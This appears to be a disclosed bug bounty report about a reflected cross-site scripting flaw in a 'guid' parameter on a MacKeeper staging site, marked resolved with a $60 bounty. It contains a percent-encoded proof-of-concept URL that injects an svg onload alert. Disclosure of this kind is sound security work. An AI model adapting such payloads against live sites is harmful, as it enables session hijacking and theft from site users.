Loading HuntDB...

Reflected XSS on stage.mackeeper.com

Low
C
Clario
Submitted None

Team Summary

Official summary from Clario

### Summary RXSS on https://stage.mackeeper.com/ , the vulnerable parameter is `guid`. ### Step to reproduce Visit the following link: `https://stage.mackeeper.com/?affid=10cee080-0303-11ea-90d3-f47c6ed85800-mzb&gr=1&guid=%68%65%6c%6c%6f%22%3e%3c%73%76%67%20%6f%6e%6c%6f%61%64%3d%61%6c%65%72%74%28%22%68%65%6c%6c%6f%5f%66%72%69%65%6e%64%22%29%3e`

Reported by karna__

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$60.00

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected